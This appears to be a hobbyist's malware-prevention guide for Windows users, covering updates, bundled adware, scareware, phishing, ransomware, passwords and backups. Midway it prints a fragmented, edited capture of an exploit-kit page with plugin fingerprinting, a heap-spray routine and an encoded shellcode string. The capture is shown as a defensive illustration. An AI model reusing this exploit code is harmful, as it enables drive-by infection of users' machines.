Reducing Your Risk:
While these recommendations are no guarantee of a malware free computer, they should help to reduce your risk. There is really no reason why your computer can not stay malware free.No amount or combination of security type software will help you if you fail to practice some precautions. Software can't think for you.
Makes no difference what the malware is either. The methods of "infection" are all the same for any malware. Knowing these methods will help to avoid it.
Instead of piling on all kinds of software to protect against this and that or asking whats the best antivirus?
- Develop and practice good computing habits.
- It is essential that you keep Windows up to date. Why?
Exploits rely on outdated/unpatched software in order to be successful. More about exploits below.
Visit Windows Update on a regular basis or use the Windows auto-update feature: XP/Vista/W7/W8/W10 all have features built-in that will download updates for you. Use the auto-update features available in most other software.
Its is essential that you keep your browsers up to date. Why?
Because updates will patch any know vulnerabilities that could be exploited to possibly install malware to your computer.
.
A browser can be a target for executing malicious code remotely. A specially crafted web page is all that is needed.
Staying updated is also essential for web based applications like Java, Adobe Flash/Reader, iTunes, Media Players, browser plug-ins and add-ons. Malware attacks are using more exploits in web based applications.
Not sure if your software is up to date? Install the free Secunia PSI which will identify, download and install updates for thousands of different programs.
Hemidal free will also scan for and update popular software.
Check your browser then follow the recommended actions with: Qualys BrowserCheck
They also have many confusing green download buttons which are just links for other software.
Even legitimate popular software can have options to install useless tool bars or other garbage offers. The defaults to install are already checked for you. The installer could:
Change your Start Page or Default Search Engine
Offer other Software to install
Display ads
Add short cuts to your desktop
Open your browser to make other offers or recommendations
Even legtimate software can request to install extra's or make changes. Below a install of Panda Free Antivirus wants to install a toolbar and change settings. Note the options are already checked for you.
Be aware that any software could come with optional offers to install more software. Chose the custom installation or uncheck/cancel any offers for
additional software to be installed. These type of installs are easily avoided if you pay attention.

Pay attention or get your software from other sites that dont bury the links, display several download buttons or use wrappers/installers that offer other garbage software. A short article about software wrappers and why you should avoid them is here and here.
The other lesson here is to get your software from the providers website and not a download portal. You can also find other alternatives to any software. If you use these type of download portals you should pay careful attention to what "extras" you could be installing.Below are good examples of PUPS, Potentially Unwanted Programs. These can be downloaded outright or come bundled with other software or display as popups on webpages.
Below are the installed PUP icons on the desktop and annoying screens that tend to pop up at random times
The only good thing about this software is thats its easily removed.


More massive confusion below: This is the web page for Imgburn which is actually very useful software. To bad I cant find the download link.
There are no installers or addons offered with this software.
Its just a confusing mess of other offers and download buttons. Theres four in the screenshot below and not one will download Imgburn.
You think number 3, the link that says download Imgburn is it?


- Read The Eula
- Uncheck offers to change your startpage or default search engine
- Uncheck offers for additional or "recommended" software
- Use custom install option.
Clean Sites that do not use installers/wrappers.
MajorGeeks
Softpedia
Snapfiles
FileForum
Keep your browser updated. Keep all extensions and addons updated. Keep Java and Flash up to date or consider removing them all togeather.
Examples of malicious web page messages that will install adware or malware:




A rather new twist on the scareware theme is to display a fake problem/message with a phone number to call for "help." Below are scary like warnings from malicious web pages. As you can see many different variations are possible.
One thing they all have in common other than some computer problem is a phone number.
Do not call for any reason. Once again available in many different scary messages and languages. This way they get your personal information and money even faster, on the phone-no forms to fill out or software to buy.
Also beware of unsolicited E-mails and personal phone calls that want to help you with any type of computer problem. Just more scamming.



Think twice about using any log in credentials on the internet unless you are sure of the web site. Many sites now offer you to log in with your exsisting G-mail, Facebook, Yahoo accounts etc. The scam site could easily just be capturing log in credentials.


Hopefully users know not to click on E-mail attachments or links no matter how convincing or urgent the message may seem. Use plain text for viewing E-mail, never respond to unsolicited e-mails, never click on links/files or call a phone number that may be provided.
Treat your E-mail address like personal information and be careful with who you share it with. The amount of junk E-mail you receive is directly related to how your E-mail address as been exposed over time.
Below
is a fake PayPal site harvesting login credentials. Hopefully you
didnt take the E-mail bait and click that link to log in to your
account.
How to identify: Phishing
Below is a E-mail attachement labeled "Purchase Order". It has a PDF like look and a screensaver extension. On installation it installs the Zbot trojan to your computer. The ahuc.exe process shown below.


P2P networks are very popular for distributing malicious files. A file could be nothing but malware or have malware bundled in it. Do you really trust the source? If you use p2p file sharing most likely you will encounter malware at some point.
Social sites are a target not just for distributing malware but also for gathering basic massive amounts of public information that could lead to social engineering attacks against individuals.
Face Book, LinkedIn etc are like phone books for gathering public information. Enough information could be gathered just to guess potential passwords.
Warez, cracks and keygens are very popular for carrying malware payloads. If you look for and install these you will also encounter malware.
Dont use P2P, cracks or keygens and stay off the social grid.
Antivirus and Malware removing software:
If either of these frequently find malware than its time to seriously review your computer habits or lack of habits.
One Antivirus and one or two anti-malware.
Software Firewalls:
Malware these days can just by-pass the firewall by using a already exsisting connection or launch and use other window components.
They can also have steep learning curves and put up complicated options where the user would have to decide to allow or deny the process along with making the right choice.
Windows firewall in its default setting is suffcient. Most people also have hardware routers to use multiple devices. A NAT router adds another layer of security.
Use Windows native firewall and get a inexpensive NAT hardware router.
A limited account is one with lesser privlieges. "This will offer some protection or limit the impact from malware." This is exactly what UAC (User Account Control) in Windows 7,8 and 10 attempts to address.
Every Microsoft remote code execution bulletin ends with this sentence: "Users whose accounts are configured to have fewer rights on the system could be less impacted than users who operate with administrative user rights." Impacted is referring to malware, fewer rights to limited accounts.
Set up limited accounts to access the internet. Use Windows UAC.Passwords
Using the same one for all accounts means that if access is gained to one then all accounts can be easily compromised.
Never use personal or any identifing information in a password. No dictionary words, pet names etc.
Whats a strong password?
How can I remember them all? Password managers will create strong passwords, store and encrypt the database and automatically populate the log in fields for you. Free password managers. I use the open source: Keepass.
If a service offers two factor authentication, use it. It provides a extra confirmation layer thats its really you logging in to your account and not a attacker.
Normally all you provide is a user name and password. With 2FA the website, say your bank would send you a unique one time code via E-mail or text that you would also have to enter on the site before getting into your account.
BackUps:
Best free drive backup software for Windows.
This would be content you created like documents, photos, video etc. Its really a "just in case." Be it hard drive failure or a computer that has to be reformatted due to malware. =
The operating system and software can always be restored.
Any content you created would be lost unless you have a backup.
Makes no difference what type of malware it is. You can get them all the same way. Ransomeware was big news in the press but the methods of infection are the same for any malware.
Examples of Scareware, Ransomware and Ransomware with Encryption:
These pop ups below aka scareware- may look like real Windows messages and icons but they are not. One way this fake software can get installed is by clicking popup messages on the internet like above or by visiting or getting re-directed to malicious sites, clicking links in E-mail etc.
You may be prompted to install software or a fake scan of you computer may take place and you are prompted to download and install the scareware. Scareware can have similar sounding names and looks just like legitimate software. Only the look and name changes.
Once installed it will bombard you with annoying balloon messages like below and provide constant prompts to register or activate the fraudulent scareware. At the least, this type of malware is easily recognized.



Another twist on the scareware theme is ransomware. Basically your computer is held "hostage" until you transfer money for a "unlock" code. Every time you boot up your screen will be plastered in full screen mode with some threating or embarrassing message accusing you of something illegal and now you have been "caught." Time to cough up some money to make it all better.
Available in several languages and variations just like scarewware.
Complete with instructions for you to follow.
In some cases files cannot be recovered without paying the ransom.
- The best defense for this and any malware really is to back up your data on a regular basis.
One of the first things the newer versions of file encrypters do is to delete your system restore points, so your out of luck restoring to a earlier time:



Locky ransomware, Feb 2016. Files of many extensions are encrypted and payment (ransom) must be paid for decryption.Yet one more reason to backup your files.


Yet another variation, dosnt really encrypt your files but rather deletes files of certain extensions

Exploits: (the silent install)
Its also not necessary to actually visit a malicious page, you could get redirected to one by clicking links in E-mails, blogs, malicious ads, social sites etc.
Even legitimate popular sites can unknowingly host malicious code that can silently install malware in the background, until its realized of course.
Below is heavily edited raw HTTP traffic from a malicious web site set up just to install malware.
In the background the site checks my OS, browser, browser plugins and there versions, then gets the appropriate exploit based on this information;
I believe this exploit took advantage of the year old flash player plugin in my browser.
The malcious javascript or flash is loaded in the browser, the exploit runs and executes the shell code commands: for example a buffer overflow against the vulnerability. In this case the exploit was directed at my year old Adobe flash player browser plugin. A malicious file was then successfully downloaded and executed on my machine. All in the background without any input by me.
This is one way that malware can seem to appear out of no where. One minute your fine, the next minute you have a new icon by the clock or your files are encrypted.
Disable Java and Flash in your browser or uninstall them. Your browser will function fine without it. At the very least: keep them updated.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK Server: nginx/1.0.15 Date: Fri, 23 Nov 2012 15:37:21 GMT Content-Type: text/html Connection: keep-aliveContent-Length: 34502
<html><head><title></title></head><body><applet archive="/xxxxxxxxxxxx.php" code="hw"><param name="val" value="0b0909041f"/><param name="prime"PluginDetect={version:"0.7.9",name:"PluginDetect",handler:function(c,b,a){return d=this,a=navigator,h,i=document,l=a.userAgent||"",j=a.vendor||"",b=a.platform||
"",k=a.product||"";d.initObj(d,["$",d]);in d.Plugins){if(d.Plugins[h]){d.initObj(d.Plugins[h],["$",d,"$$",d.Plugins[h]],1)}}d.convertFuncs(d);d.OS=100;if(b){var g=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win.*CE",22.1,
"Win.*Mobile",22.2,"Pocket\s*PC",22.3,"",100];for(h=g.length-2;h>=0;h=h-2){if(g[h]&&newRegExp(g[h],
"i").test(b)){d.OS=g[h+1];break}}};d.head=i.getElementsByTagName("head")[0]||i.
getElementsByTagName("body")[0]||i.body||null;d.isIE=new Function("return/*@cc_on!@*/!1")();d.verIE=d.isIE&&(/MSIE\s*(\d+\.?\d*)/i).test(l)
?parseFloat(RegExp.$1,10):null;d.ActiveXEnabled=false;if(d.isIE){var h,m=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM",
"ShockwaveFlash.ShockwaveFlash"(c.verGecko&&c.compareNums(c.verGecko,
c.formatNum("2"))<0)||(c.isSafari&&(!c.verSafari||c.compareNums(c.verSafari,c
.formatNum("4"))<0))||(c.verOpera&&c.verOpera<10)){b=[1,1,1]}return b},getVersion:function(j,g,i){varthis.$$.isDisabled.AXO()},
JavaVersions:[[1,9,1,40],[1,8,1,40],[1,7,1,40],[1,6,0,40],[1,5,0,30],[1,4,2,30],[1,3,1,30]],query:function(){var x1}if(e[d]==1&&!b.getResult()[0]){return 1}}return 0},should_Insert_Query_Any:function(){var /><embedsrc='"+url+"'name='asd'align='middle'allowNetworking='all'type='application/x-shockwave-flash'
pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>";}functiongetCN(){return "/xxxxxxx.php?yba="+x("05798")+"&qiaqcyfz="+x("mxytw")+"&hrgcw=33:1l:1g:2v:30:1m:33:32:1l
1k&cdpfcb=pyvro"}functiongetBlockSize(){return1024}function getAllocSize(){return1024*1024}functiongetAllocCount(){return300}functiongetFillBytes(){var a='%u'+'0c0c';return a+a} function getShellCode() a="8200!%f582!%9451!%e014!%5195!%95e5!%34e0!%5191!%e0d5!%9134!%4421!%2191!%b1a
1!%b121!%21b1!%9154!%
8121!%21b1!%!%3867!%b2de!%%f421!%2191!%9144!%b121!%51b1!%54d4!%64e 0!%2191!%9174!%5421!%2191!%9134
!%e421!%5191!%95e4!%8571!%8504!%b560!%b4c5!494!%c450!%94a5!%a5f5!%e
474!%f470!%1464!%94b5!%44d4!%
7085!%b4b4!%c460!%c544!%e460!!%423a!%3a86!%8681!%c43a!%b18e!%1%d5c
1!%dacc4!%2370!%15e1!%eee6!%
3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%
f4b5!%a5d4 %8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42d!%0402!%bd3a!%
eb3c!%c5b2!%42b
1!%8a55!%0480!%583a!%3cb7!%17 url="/xxxxxxxx.php?zkayg="+x("05798")+"&yfrmf="+x("fpwr")+"&pvtcd=33:1l:1g:2v:30:1m:33:32:1l:
1k&mrfsie=quhbe";oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='"+url+"' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed src='"+url+"' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash'width='10' height='10'></embed></object>";document.body.appendChild(oSpan);}document.write('');
setTimeout(end_redirect,61000);vapdfver=[];function svwrbew($.getVersion("Ja"+"va")+".").toString()["split"](".");if ($.isMinVersion("Ja"+"vares=ar[arcalli]();arcalli++;if(res){ss(function(){arcall()},5509);
}else{arcall();}};arcall();}$$["onDetec"+"tionDone"]("Ja"+"va",svwrbew6436b, "../data/getJavaInfo.jar");}</script></body></html>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
This is what the actual malicious page might display, while all the checking, downloading and installing goes on in the background. As you can see from the examples below, any and all types of malware are possible.





"The attack used a malicious HTML page to load the malformed MIDI file as an embedded object for the Windows Media Player browser plug-in. If successful, the exploit silently downloaded a Remote Access Trojan (RAT) on the user’s machine without the user’s knowledge." Source

Malicious URL in Media Player:

Keep software, browsers and plugins updated to prevent silent installs. Remove Java and Flash.
Two of the biggest culprits are Adobe Flash and the Java Runtime Environment. Both are used in your browser. Even if kept updated it dosnt take long before a new vulnerability is exploited. All have a frequent exploit/patch cycle. There really not worth the risk.
They can be uninstalled. Your browser will function fine without them. This will prevent a silent install from taking place and reduce your browsers attack surface. You can also use a ad-blocker, not only will it make for a cleaner looking web page but it also could block a malicious ad from being launched.
Adobe Flash Player update includes 79 fixes...
Disable flash and Java.
Disable Java


Social engineering, relying on the user is by far the easiest way to compromise a machine.

:


All this goes on in the background. The file is downloaded and executed on your machine. A redirection to the site hosting the file. The first file hosted at dropbox (in red, line 23) has already been removed. It may have been malware or the video to watch? Files may not last long at some hosting sites. The first downloaded file, line 24 I believe is the malicious Java file in the prompt. The actual payload (.exe) from another site is line 25 which is downloaded and executed on your machine.
The payload, line 25. All this happens in the background. No action needed on your part other than clicking Run in the applet prompt.
The downloaded file, bp.exe on my desktop and a scan result of the file from Jotti. Yawn, its another trojan. Script Kiddie stuff.
Malware using legitimate software to capture key strokes, video and screenshots then upload them.


Email that arrived as a postcard, this one happens to be a picture (summer.jpg). Could be any picture. A double click to view it displays the picture and in the background installs a IRC trojan.
This is not a exploit but simply malware thats installed by a simple double-click of a E- mail attachment.
Server list, associated files and a response from the Budapest server in Wireshark. The irc pong command is a acknowledgment of a ping. A connection check.
The Process: plugin.exe and jusched

Command and Control Log In to direct tasks for the bot. Basically your computer is controlled remotely for various activities.

The process : dllhost.exe


RAT (remote access trojan):

Yet another backdoor:


Make sure you know what you install to your computer


Useful Links
-
Free Anti-malware:
SpyBot
Superantispyware
Free Antivius/Anti-malware:
Security Essentials
Avira
Avast
Comodo AV


A Few Help Forums:
GeeksToGo
Malwarebytes Forum
Safer-Networking
Bleeping Computer
Tech Support Guy
What The Tech

























All screenshots taken from my abused 'live" malware install machine. Currently running a unpatched W7.